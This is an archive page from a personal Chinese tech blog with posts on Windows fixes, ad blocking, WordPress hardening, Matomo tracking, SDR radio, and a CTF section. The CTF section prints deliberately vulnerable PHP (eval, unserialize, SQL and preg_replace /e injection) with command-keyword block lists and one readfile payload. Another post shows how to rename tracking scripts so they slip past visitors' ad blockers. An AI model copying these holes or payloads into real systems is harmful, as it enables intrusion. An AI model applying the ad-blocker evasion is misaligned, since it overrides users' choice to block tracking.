分类目录归档:Uncategorized

如何在没有微软商店的情况下安装NVIDIA控制面板

前些天在安装NIVIDIA驱动后发现没有一并安装NVIDIA Control Panel(英伟达控制面板),问题在于我停用了Windows Update,而NVIDIA控制面板又是从微软商店安装的,在停用Update的同时也把商店停用了

原因

英伟达在Windows10后推出DCH版驱动后

My Windows 10 PC has NVIDIA DCH Display Drivers installed. Can I download and install NVIDIA Standard Display Drivers from NVIDIA.com?

Yes, you can locate and download the driver through the Advanced Driver Search.

其中的 Advanced Driver Search 在新版驱动搜索网页已经消失(英伟达已经不再更新标准版驱动了)

解决方法

首先打开第三方的微软商店下载器,输入NVIDIA Control Panel的网址,即 https://apps.microsoft.com/detail/9nf8h0h7wmlt

加载完成后可以看到列表如下:

Capture of store.rg-adguard.net

右键保存最新的版本,这里以 NVIDIACorp.NVIDIAControlPanel_8.1.968.0_x64__56jybvy8sckqj.appx 为例

下载后打开PowerShell,执行命令(当然文件名是会随着更新变得)

Add-AppxPackage .\NVIDIACorp.NVIDIAControlPanel_8.1.968.0_x64__56jybvy8sckqj.Appx 

完成后右键桌面如无意外即可看到NVIDIA控制面板的选项

 

解决Windows系统下安装tflite-support时的报错

最近因为一些原因需要用到tflite-support这个库,但是当使用pip安装时出现错误,具体错误如下:

      C:\Users\xxxxx\AppData\Local\Programs\Python\Python3x\lib\site-packages\setuptools\command\build_py.py:202: SetuptoolsDeprecationWarning:     Installing 'tflite_support.flatbuffers' as data is deprecated, please list it in `packages`.
          !!
          ############################
          # Package would be ignored #
          ############################
          Python recognizes 'tflite_support.flatbuffers' as an importable package,
          but it is not listed in the `packages` configuration of setuptools.

          'tflite_support.flatbuffers' has been automatically added to the distribution only
          because it may contain data files, but this behavior is likely to change
          in future versions of setuptools (and therefore is considered deprecated).

          Please make sure that 'tflite_support.flatbuffers' is included as a package by using
          the `packages` configuration field or the proper discovery methods
          (for example by using `find_namespace_packages(...)`/`find_namespace:`
          instead of `find_packages(...)`/`find:`).

          You can read more about "package discovery" and "data files" on setuptools
          documentation page.
      !!

        check.warn(importable)
      copying tflite_support\metadata_schema.fbs -> build\lib.win-amd64-cpython-310\tflite_support
      creating build\lib.win-amd64-cpython-310\tflite_support\flatbuffers
      copying tflite_support\flatbuffers\__init__.py -> build\lib.win-amd64-cpython-310\tflite_support\flatbuffers
      copying tflite_support\flatbuffers\builder.py -> build\lib.win-amd64-cpython-310\tflite_support\flatbuffers
      copying tflite_support\flatbuffers\compat.py -> build\lib.win-amd64-cpython-310\tflite_support\flatbuffers
      copying tflite_support\flatbuffers\encode.py -> build\lib.win-amd64-cpython-310\tflite_support\flatbuffers
      copying tflite_support\flatbuffers\number_types.py -> build\lib.win-amd64-cpython-310\tflite_support\flatbuffers
      copying tflite_support\flatbuffers\packer.py -> build\lib.win-amd64-cpython-310\tflite_support\flatbuffers
      copying tflite_support\flatbuffers\table.py -> build\lib.win-amd64-cpython-310\tflite_support\flatbuffers
      copying tflite_support\flatbuffers\util.py -> build\lib.win-amd64-cpython-310\tflite_support\flatbuffers
      running build_ext
      building '_pywrap_codegen' extension
      error: Microsoft Visual C++ 14.0 or greater is required. Get it with "Microsoft C++ Build Tools": https://visualstudio.microsoft.com/visual-cpp-build-tools/
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure

× Encountered error while trying to install package.
╰─> tflite-support

note: This is an issue with the package mentioned above, not pip.
hint: See above for output from the failure.

这是因为tflite-support没有官方的Windows发行版,因此在Windows系统上需要自行编译

从输出可以看到:error: Microsoft Visual C++ 14.0 or greater is required. Get it with “Microsoft C++ Build Tools”: https://visualstudio.microsoft.com/visual-cpp-build-tools/

即本地没有C++编译器,因此我们只需安装C++编译器即可:https://visualstudio.microsoft.com/zh-hant/visual-cpp-build-tools

在安装时只需要勾选 使用C++的桌面开发 ,无需勾选其余项目

在安装后使用命令 pip install tflite-support 重新安装即可

 

AdAway – 安卓老牌开源广告屏蔽器

AdAway 是一个开源的安卓广告拦截工具,利用修改系统的hosts文件实现屏蔽广告

当设备进行DNS查询时,系统会以hosts文件优先,而AdAway将与广告联盟的域名解析到0.0.0.0或127.0.0.1,从而阻断广告请求

由于需要修改hosts,因此需要ROOT权限,软件同时也提供无需ROOT的VPN版本

该软件能够阻挡大多数应用和网页的广告联盟,如AdSense, 穿山甲

类似的软件还有AdGuard, Blokada等

软件设置

AdAway 官网: https://adaway.org

下载并安装软件后可以选择使用ROOT模式或VPN模式,VPN模式会增加耗电量,所以尽可能选择ROOT模式

点击ROOT模式后会调出SU授权框,取决于你用的SU管理器(Magisk, KernelSU…),点击同意

A capture of AdAway main screen

到软件主画面可以看到默认已经有三个广告拦截规则。此时打开网页基本不会看到广告,不过为了达到更好的效果,我还额外添加了广告规则

点击类似书签的按钮再点击加号即可添加规则,我添加了以下的规则:

https://divested.dev/hosts

https://raw.githubusercontent.com/jdlingyu/ad-wars/master/hosts

最后,这类通过DNS过滤实现屏蔽广告的方案还是有漏网之鱼的

比如Youtube的广告和视频是在同一个域名(屏蔽广告的同时也屏蔽了视频)

要屏蔽Youtube这类网站的广告只能靠第三方APP或者浏览器插件了

 

 

加固WordPress – 避免暴力破解密码

WordPress作为一个市场占有量最高的CMS,其登录页面wp-login.php每天经受不少的爆破尝试,以我的博客为例,在短短24小时内就被(尝试)爆破了160次

要避免这个问题很简单,我主要用了以下两种方式

限制登录次数

有很多插件可以实现限制登录次数,这里以Limit Login Attempts Reloaded这个插件为例

插件分为免费以及付费版,不过免费版够用了

安装并启用插件,转到插件设置页面,可以设置尝试错误密码多少次后拦截

以下是我的设置:

After a specific IP address fails to log in 4 times, a lockout lasting 20 minutes is activated. If additional failed attempts occur within 24 hours and lead to another lockout, once their combined total hits 4, the 20 minutes duration is extended to 24 hours. The lockout will be lifted once 24 hours have passed since the last lockout incident.

添加验证码

常见的验证码有不少,Cloudflare Turnstile, reCAPTCHA, hCaptcha等等

我比较习惯用老牌的reCAPTCHA

创建reCAPTCHA ,reCAPTCHA 类型可选V2, V3其中V2需要手动点击,而V3为无感验证

创建后会获得网站密钥及密钥,回到网站安装Advanced Google reCAPTCHA插件

启用插件后找到插件设置,填入Captcha Site Key, Captcha Secret Key,输入后会弹出Verify Captcha按钮,验证一次后即可保存设置

找到Where To Show菜单,这里可以验证码展示的位置,我选择关闭评论的验证码(因为我会手动筛选评论,而且不希望被JS拖慢网站速度)

 

最后,不要用admin这类的弱密码…

写在独立博客三周年

不知不觉博客已经运行三年了,三年前创建这个博客的原因主要是想靠广告赚钱,到真的搭了博客后才发现博客是一门亏钱的生意…

无论如何,这个博客就断断徐徐的运行到了现在

博客的时间线:

  • 2022.08 初代博客,使用Typecho及Freewind主题
  • 2023.11 将博客搬到NAS内,用Warp穿透
  • 2024.07 从NAS搬到Github+Vercel以及更换到Hexo+Volantis
  • 2025.08 从Hexo又搬到Wordpress

在博客三周年之际,从用了一年多的Hexo又换成Wordpress,下一次大改可能又是一年后

在换成WP后Google的收录又回来了,而Bing还是久久不更新

截至今天,网站的DR为26

流量来源

在7天内,来自搜索引擎(Google和Bing)的流量最高,共为30UV,其次为各博客聚合网站

  • 开往 10UV
  • 十年之约 13UV
  • 博友圈 3UV
  • 无聊湾 2UV
  • BlogFinder 1UV
  • 博客说 1UV
  • BlogWe 1UV

以及各友情链接带来共22UV

未来规划

  • 做好SEO
  • 获取更多Backlinks
  • 发多点文章
  • 降低成本

我认为,在SEO中反向链接是非常重要的一点,即便不能提升我的Page rank,也能带来一定数量的访客

目前我获得backlink的主要方法是友情链接…以及评论,不过我同意一个观点:如果一个链接很容易就能获得,那它就没啥价值

无论如何,接下来尝试做点SEO吧

 

Matomo统计绕过Adblock拦截

大部分Adblock默认会把matomo.js封锁,所以我们需要将文件”改名”
把js以及php代理,这里以Wordpress安装的Matomo为例
如果你不是以WP安装,记得域名中也不要包含matomo, tracking这类关键字
Apache .htaccess

RewriteEngine On 
RewriteRule ^wp-content/plugins/app/class$ wp-content/uploads/matomo/matomo.js [L] 
RewriteRule ^wp-content/plugins/app/class\.php$ wp-content/plugins/matomo/app/matomo.php [L]

另外`matomo.php?action_name=`也会被拦截,所以需要从默认的GET请求更换成POST请求,这里是修改后的代码

<script data-cfasync="false">
(function () {
function initTracking() {
var _paq = window._paq = window._paq || [];
_paq.push(['setRequestMethod', 'POST']);
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
_paq.push(['alwaysUseSendBeacon']);
_paq.push(['setTrackerUrl', "\/\/example.site\/wp-content\/plugins\/app\/class.php"]);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
g.type='text/javascript';
 g.async=true;
 g.src="\/\/example.site\/wp-content\/plugins\/app\/class";
 s.parentNode.insertBefore(g,s);
}
if (document.prerendering) {
	document.addEventListener('prerenderingchange', initTracking, {once: true});
} else {
	initTracking();
}
})();
</script>

数条CTF题目

evilecho

index.php

<?php

echo <span class="hljs-string">"<h2>Tips: eval & echo = ?</h2>"</span>;

<span class="hljs-variable">$hostHeader</span> = <span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">'HTTP_HOST'</span>];
list(<span class="hljs-variable">$hostname</span>, <span class="hljs-variable">$port</span>) = explode(<span class="hljs-string">':'</span>, <span class="hljs-variable">$hostHeader</span>);

<span class="hljs-variable">$image</span> = isset(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">"file"</span>]) ? <span class="hljs-string">"./images/"</span> . <span class="hljs-variable">$_GET</span>[<span class="hljs-string">"file"</span>] : <span class="hljs-string">""</span>;

<span class="hljs-keyword">if</span> (<span class="hljs-variable">$image</span> == <span class="hljs-string">""</span>) {
    header(<span class="hljs-string">"Location: "</span> . <span class="hljs-string">"http://$hostname:$port"</span> . <span class="hljs-string">"/index.php?file=eason.jpg"</span>);
}

<span class="hljs-variable">$file</span> = <span class="hljs-string">"echo '<img src=\""</span> . <span class="hljs-variable">$image</span> . <span class="hljs-string">"\" width=200px height=auto>';"</span>;

<span class="hljs-keyword">if</span> (in_array(strtolower(<span class="hljs-variable">$image</span>), array(<span class="hljs-string">"cat"</span>, <span class="hljs-string">" "</span>, <span class="hljs-string">"flag"</span>, <span class="hljs-string">"docker"</span>, <span class="hljs-string">"shell_exec"</span>, <span class="hljs-string">"exec"</span>, <span class="hljs-string">"popen"</span>))) {
    <span class="hljs-keyword">exit</span>(<span class="hljs-string">"Hacker!!!!"</span>);
}
eval (<span class="hljs-variable">$file</span>);

?>

happy

index.php

 <span class="php"><span class="hljs-meta"><?php</span>
highlight_file(<span class="hljs-keyword">__FILE__</span>);
error_reporting(<span class="hljs-number">0</span>);

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">hahaha</span>
</span>{
    <span class="hljs-keyword">public</span> $cmd;
    <span class="hljs-keyword">public</span> $content;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($cmd, $content)</span>
    </span>{
        <span class="hljs-keyword">$this</span>->cmd = $cmd;
        <span class="hljs-keyword">$this</span>->content = $content;
    }

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span><span class="hljs-params">($name, $arguments)</span>
    </span>{
        call_user_func(<span class="hljs-keyword">$this</span>->cmd, <span class="hljs-keyword">$this</span>->content);
    }

}

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Nevv</span>
</span>{
    <span class="hljs-keyword">public</span> $happiness;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span><span class="hljs-params">()</span>
    </span>{
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>->happiness->check();
    }

}

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Rabbit</span>
</span>{
    <span class="hljs-keyword">public</span> $aspiration;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__set</span><span class="hljs-params">($name, $val)</span>
    </span>{
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>->aspiration->family;
    }
}

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Year</span>
</span>{
    <span class="hljs-keyword">public</span> $key;
    <span class="hljs-keyword">public</span> $rabbit;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($key)</span>
    </span>{
        <span class="hljs-keyword">$this</span>->key = $key;
    }

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">firecrackers</span><span class="hljs-params">()</span>
    </span>{
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>->rabbit->wish = <span class="hljs-string">"allkill QAQ"</span>;
    }

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span><span class="hljs-params">($name)</span>
    </span>{
        $name = <span class="hljs-keyword">$this</span>->rabbit;
        $name();
    }

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span><span class="hljs-params">()</span>
    </span>{
        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">$this</span>->key == <span class="hljs-string">"come on"</span>) {
            <span class="hljs-keyword">$this</span>->firecrackers();
        } <span class="hljs-keyword">else</span> {
            <span class="hljs-keyword">print</span> (<span class="hljs-string">"Welcome 2025!!!!!"</span>);
        }
    }
}

<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">'poc'</span>])) {
    $a = unserialize($_GET[<span class="hljs-string">'poc'</span>]);
} <span class="hljs-keyword">else</span> {
    <span class="hljs-keyword">echo</span> <span class="hljs-string">"come on"</span>;
}


<span class="hljs-meta">?></span></span>

issql

index.php

<span class="hljs-tag"><<span class="hljs-name">html</span> <span class="hljs-attr">xmlns</span>=<span class="hljs-string">"http://www.w3.org/1999/xhtml"</span>></span>
<span class="hljs-comment"><!--This set of source code is made by MS. --></span>
<span class="hljs-comment"><!--Date 2018.12.13--></span>
    <span class="hljs-tag"><<span class="hljs-name">head</span>></span>
        <span class="hljs-tag"><<span class="hljs-name">meta</span> <span class="hljs-attr">http-equiv</span>=<span class="hljs-string">Content-Type</span> <span class="hljs-attr">content</span>=<span class="hljs-string">"text/html;charset=utf-8"</span>></span>
        <span class="hljs-tag"><<span class="hljs-name">meta</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"description"</span> <span class="hljs-attr">content</span>=<span class="hljs-string">"Test"</span>></span>
        <span class="hljs-tag"><<span class="hljs-name">meta</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"author"</span> <span class="hljs-attr">content</span>=<span class="hljs-string">"MRYE+"</span>></span>
        <span class="hljs-tag"><<span class="hljs-name">title</span>></span>电脑信息查询 - 网络安全工作室<span class="hljs-tag"></<span class="hljs-name">title</span>></span>
        <span class="hljs-tag"><<span class="hljs-name">link</span> <span class="hljs-attr">rel</span>=<span class="hljs-string">"stylesheet"</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"text/css"</span> <span class="hljs-attr">href</span>=<span class="hljs-string">"./css/ctf.css"</span> /></span>    
    <span class="hljs-tag"></<span class="hljs-name">style</span>></span>
<span class="hljs-tag"></<span class="hljs-name">head</span>></span>
<span class="hljs-tag"><<span class="hljs-name">body</span>></span>
<span class="hljs-tag"><<span class="hljs-name">div</span> <span class="hljs-attr">class</span>=<span class="hljs-string">"container"</span>></span>
  <span class="hljs-tag"><<span class="hljs-name">div</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"search"</span>></span>
    <span class="hljs-tag"><<span class="hljs-name">label</span> <span class="hljs-attr">for</span>=<span class="hljs-string">"search"</span>></span>输入以1、2、3显示电脑信息<span class="hljs-tag"></<span class="hljs-name">label</span>></span>
    <span class="hljs-tag"><<span class="hljs-name">form</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"myForm"</span> <span class="hljs-attr">action</span>=<span class="hljs-string">""</span> <span class="hljs-attr">method</span>=<span class="hljs-string">"post"</span>></span>
    <span class="hljs-tag"><<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"text"</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"ms"</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"ms"</span><span class="hljs-attr">maxlength</span>=<span class="hljs-string">"1"</span>></span>
    <span class="hljs-tag"><<span class="hljs-name">input</span> <span class="hljs-attr">class</span>=<span class="hljs-string">"button"</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"submit"</span> <span class="hljs-attr">value</span>=<span class="hljs-string">"Search"</span>></span>
    <span class="hljs-tag"></<span class="hljs-name">form</span>></span>
<span class="php"><span class="hljs-meta"><?php</span>
<span class="hljs-comment">//禁用错误报告</span>
error_reporting(<span class="hljs-number">0</span>);
header(<span class="hljs-string">"Content-Type: text/html;charset=utf-8"</span>);
<span class="hljs-keyword">require_once</span> <span class="hljs-string">'./suxinctf.php'</span>;

<span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">"ms"</span>]))
{
    $ID = $_POST[<span class="hljs-string">"ms"</span>];
    <span class="hljs-comment">#echo $ID;</span>
    $query = <span class="hljs-string">"select * from goods where id='{$ID}'"</span>;<span class="hljs-comment">//构建查询语句</span>
    $result = mysql_query($query);<span class="hljs-comment">//执行查询</span>
    <span class="hljs-keyword">if</span> (!$result) {
        <span class="hljs-keyword">die</span>(<span class="hljs-string">"could not to the database\n"</span> . mysql_error());
    }
    <span class="hljs-keyword">if</span> (mysql_numrows($result)<=<span class="hljs-number">0</span>) {
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<script     type='text/javascript'>alert('都说了让你输入1~3你咋还那么调皮!');location.href='index.php'</script>"</span>;
    }<span class="hljs-keyword">else</span>{
    <span class="hljs-keyword">while</span>($result_row=mysql_fetch_row(($result)))<span class="hljs-comment">//取出结果并显示</span>
    {
        $ms=$result_row[<span class="hljs-number">0</span>];
        $gname=$result_row[<span class="hljs-number">1</span>];
        $gprice=$result_row[<span class="hljs-number">2</span>];
        $gnum=$result_row[<span class="hljs-number">3</span>];
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<font color='red'>电脑编号为:"</span>.$ms.<span class="hljs-string">"  </font> "</span>;;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<font color='red'>电脑系统为:"</span>.$gname.<span class="hljs-string">"  </font>"</span>;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<font color='red'>电脑价格为:"</span>.$gprice.<span class="hljs-string">"  </font>"</span>;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<font color='red'>电脑数量为:"</span>.$gnum.<span class="hljs-string">"  </font>"</span>;
}
}
}
    $query = <span class="hljs-string">"select * from goods "</span>;<span class="hljs-comment">//构建查询语句</span>
    $result = mysql_query($query);<span class="hljs-comment">//执行查询</span>
    <span class="hljs-keyword">if</span> (!$result) {
        <span class="hljs-keyword">die</span>(<span class="hljs-string">"could not to the database\n"</span> . mysql_error());
    }
    <span class="hljs-keyword">if</span> (mysql_numrows($result)<=<span class="hljs-number">0</span>) {
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<script     type='text/javascript'>alert('都说了让你输入1~3你咋还那么调皮!');location.href='index.php'</script>"</span>;
    }<span class="hljs-keyword">else</span>{
    <span class="hljs-keyword">while</span>($result_row=mysql_fetch_row(($result)))<span class="hljs-comment">//取出结果并显示</span>
    {
        $ms=$result_row[<span class="hljs-number">0</span>];
        $gname=$result_row[<span class="hljs-number">1</span>];
    }

mysql_close($connection);<span class="hljs-comment">//关闭连接</span>
}
<span class="hljs-meta">?></span></span>
  <span class="hljs-tag"></<span class="hljs-name">div</span>></span>
<span class="hljs-tag"></<span class="hljs-name">div</span>></span>
<span class="hljs-tag"></<span class="hljs-name">body</span>></span>
<span class="hljs-tag"></<span class="hljs-name">html</span>></span>

suxinctf.php

<span class="php"><span class="hljs-meta"><?php</span>
$host = <span class="hljs-string">'localhost'</span>;
$database = <span class="hljs-string">'ctf'</span>;
$username = <span class="hljs-string">'root'</span>;
$password = <span class="hljs-string">''</span>;
$connection = mysql_connect($host, $username, $password);<span class="hljs-comment">//连接到数据库</span>
mysql_query(<span class="hljs-string">"set names 'utf8'"</span>);<span class="hljs-comment">//编码转化</span>
<span class="hljs-keyword">if</span> (!$connection) {
    <span class="hljs-keyword">die</span>(<span class="hljs-string">"could not connect to the database.\n"</span> . mysql_error());<span class="hljs-comment">//诊断连接错误</span>
}
$selectedDb = mysql_select_db($database);<span class="hljs-comment">//选择数据库</span>
<span class="hljs-keyword">if</span> (!$selectedDb) {
    <span class="hljs-keyword">die</span>(<span class="hljs-string">"could not to the database\n"</span> . mysql_error());
}
<span class="hljs-meta">?></span></span>

ezphp

register.php

<span class="hljs-meta"><?php</span>
    <span class="hljs-keyword">include</span> <span class="hljs-string">"utils/function.php"</span>;
    $config = <span class="hljs-keyword">include</span> <span class="hljs-string">"utils/config.php"</span>;
    $user_xml_format = <span class="hljs-string">"<?xml version='1.0'?>
                        <userinfo>
                            <user>
                                <username>%s</username>
                                <password>%s</password>
                            </user>
                        </userinfo>"</span>;
    extract($_REQUEST);
    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>($username)||<span class="hljs-keyword">empty</span>($password)) <span class="hljs-keyword">die</span>(<span class="hljs-string">"Username or password cannot be empty XD"</span>);

    <span class="hljs-keyword">if</span>(!preg_match(<span class="hljs-string">'/^[a-zA-Z0-9_]+$/'</span>, $username)) <span class="hljs-keyword">die</span>(<span class="hljs-string">"Invalid username. :("</span>);

    <span class="hljs-keyword">if</span>(is_user_exists($username, $config[<span class="hljs-string">"user_info_dir"</span>])) <span class="hljs-keyword">die</span>(<span class="hljs-string">"User already exists XD"</span>);
    $user_xml = sprintf($user_xml_format, $username, $password);

    register_user($username, $config[<span class="hljs-string">'user_info_dir'</span>], $user_xml);

login.php

<span class="php"><span class="hljs-meta"><?php</span>
    <span class="hljs-keyword">include</span> <span class="hljs-string">"utils/function.php"</span>;
    $config = <span class="hljs-keyword">include</span>  <span class="hljs-string">"utils/config.php"</span>;
    $username = $_REQUEST[<span class="hljs-string">'username'</span>];
    $password = $_REQUEST[<span class="hljs-string">'password'</span>];
    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>($username)||<span class="hljs-keyword">empty</span>($password)) <span class="hljs-keyword">die</span>(<span class="hljs-string">"Username or password cannot be empty XD"</span>);
    <span class="hljs-keyword">if</span>(!is_user_exists($username, $config[<span class="hljs-string">"user_info_dir"</span>])) <span class="hljs-keyword">die</span>(<span class="hljs-string">"Username error"</span>);
    $user_record = get_user_record($username, $config[<span class="hljs-string">'user_info_dir'</span>]);
    <span class="hljs-keyword">if</span>($user_record->user->password != $password) <span class="hljs-keyword">die</span>(<span class="hljs-string">"Password error for User:"</span>.$user_record->user->username);
    header(<span class="hljs-string">"Location:main.html"</span>);</span>

crackme

index.php

<span class="php"><span class="hljs-meta"><?php</span>
<span class="hljs-keyword">if</span> ($_GET[<span class="hljs-string">'crack'</span>] === <span class="hljs-string">'flag'</span>) {
    highlight_file(<span class="hljs-keyword">__FILE__</span>);
    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">'hk'</span>]) && <span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">'flag'</span>])) {
        $str1 = $_POST[<span class="hljs-string">'hk'</span>];
        $str2 = $_POST[<span class="hljs-string">'flag'</span>];
        <span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">'/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i'</span>, $str1) || strlen($str2) != <span class="hljs-number">19</span> || preg_match(<span class="hljs-string">'/give_me_flag/'</span>, $str2)) {
            <span class="hljs-keyword">die</span>(<span class="hljs-string">'hacker!'</span>);
        } <span class="hljs-keyword">else</span> {
            preg_replace(<span class="hljs-string">"/give_me_flag/ei"</span>, $_POST[<span class="hljs-string">'hk'</span>], $_POST[<span class="hljs-string">'flag'</span>]);
        }
    }
} <span class="hljs-keyword">else</span> {
    <span class="hljs-keyword">echo</span> <span class="hljs-string">"moran want a flag.</br>(?crack=flag)"</span>;
}</span>
<span class="hljs-keyword">POST</span> <span class="hljs-string">?crack=flag&a=readfile&b=/flag</span> HTTP/1.1

<span class="ini"><span class="hljs-attr">hk</span>=<span class="hljs-variable">$_GET</span>[a](<span class="hljs-variable">$_GET</span>[b])&flag=give_me_Flag/ei1111</span>

 

利用RTL-SDR接收ADS-B信号并追踪飞机

RTL-1090

安装驱动(Zadig)

如果你已经根据RTL-SDR博客网站正确的安装了驱动,则请跳过此部分

打开Zadig.exe,上方Options>List all devices,找到Bulk-In, Interface (Interface 0)并确保USB ID为0BDA 2838 00 确认无误后点击Replace Driver 等待加载后驱动便安装完成了

安装RTL-1090

前往rtl1090.com,找到RTL1090.EXE VERSION 2并下载 这时候直接运行会提示缺少rtlsdr.dll,libusb-1.0.dll两个运行库 其中rtlsdr.dll来自rtlsdrblog/rtl-sdr-bloglibsub-1.0.dll来自libusb/libusb 把dll下载到同目录后运行即可 运行后看见很大一个START按钮,点就对了

现在你应该能看见一些随机的文字,看不懂吗?我也看不懂 所以我们需要把解码后的数据放到地图上显示 主要有两个软件能实现,分别是Virtual Radar,ADSBScope,这里我以ADSBScope为例

ADSBScope

前往sprut.de/electronic/pic/projekte/adsb/adsb_en.html#downloads并下载最新版本的ADSBScope 运行后上方load Maps>Aisa Central加载地图,other>Network>Network setup>RAW-data-client 点击local,RTL1090 回到主界面,other>Network>Raw-data Client active 到这里全部的设置都已经完成了,地图上应该显示了一些飞机的轨迹 如果没有的话,可能是天线摆放的位置不对,亦或只是附近没有飞机罢了

树莓派配合RTL-SDR搭建OpenWebRx

RTL-SDR驱动

在安装之前,我们需要先安装驱动,安装驱动非常简单,只需一行命令 sudo apt install rtl-sdr

安装OpenWebRX

这里使用apt安装

wget -O /usr/share/keyrings/openwebrx<span class="hljs-selector-class">.gpg</span> https:<span class="hljs-comment">//repo.openwebrx.de/openwebrx.gpg</span>
echo <span class="hljs-string">"deb [signed-by=/usr/share/keyrings/openwebrx.gpg] https://repo.openwebrx.de/debian/ experimental main"</span> > /etc/apt/sources<span class="hljs-selector-class">.list</span><span class="hljs-selector-class">.d</span>/openwebrx-experimental<span class="hljs-selector-class">.list</span>
apt-get update
apt-get install openwebrx

From openwebrx.de/download/debian.php

使用openwebrx启动

绑定端口

nano /etc/openwebrx/openwebrx.conf

<span class="hljs-section">[web]</span>
<span class="hljs-attr">port</span> = <span class="hljs-number">8088</span>

这里由于默认端口占用,所以我转到了8088端口

另外,默认的管理页面为/admin